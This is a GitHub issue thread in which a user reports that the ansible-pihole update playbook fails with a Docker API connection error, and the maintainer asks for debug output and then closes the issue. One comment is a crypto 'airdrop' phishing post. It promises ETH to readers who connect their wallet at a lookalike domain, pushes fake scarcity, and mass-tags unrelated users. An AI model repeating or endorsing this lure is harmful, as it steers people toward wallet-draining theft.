### ISSUE TITLE
update-pihole.yaml failing with: Error connecting: Error while fetching server API version: ('Connection aborted.', FileNotFoundError(2, 'No such file or directory'))"}

### ISSUE THREAD

**Issue by briandye** [shaderecker/ansible-pihole#15]
Hello, I am trying to run the update-pihole.yaml on some piholes I had configured prior to finding your tool. I did not deploy these piholes with this tool.

When I try to run update it fails in task:

```
TASK [pihole : Start/Update pihole container] **********************************

fatal: [pihole-2]: FAILED! => {"changed": false, "msg": "Error connecting: Error while fetching server API version: ('Connection aborted.', FileNotFoundError(2, 'No such file or directory'))"}

```

The prior tasks appear to work fine, ssh connection looks okay, any thoughts? Just looking for a simple way to keep piholes up to date with Ansible. I am already using rsync on the two to keep them synchronized, so I don't think I need ha mode, was just going to run update on each one.

**Comment by shaderecker** [comment]
Hi @briandye 
I cannot really judge from the output why it is failing for you, but since it isn't deployed with the `bootstrap-pihole.yaml` playbook there might be some differences between the setups.

Which task was working before and which one is failing there now?
Can you please provide more output / debug level output.

**Comment by bahramiholding** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
sjrichar, @marcaube, @VerTiGoEtrex, @evandapolarbear, @RobertoD91, @maajix, @BMWilding, @Kr0ff, @Manuservus11, @shamine, @perryzjc, @peterzhu2118, @adhikara13, @adenkiewicz, @cavejohnson101, @incredibleindishell, @svennergr, @adriensaladin, @mitangelo, @humamaboalraja

**Comment by shaderecker** [comment]
Hi @briandye,
Closing this since there was no feedback.
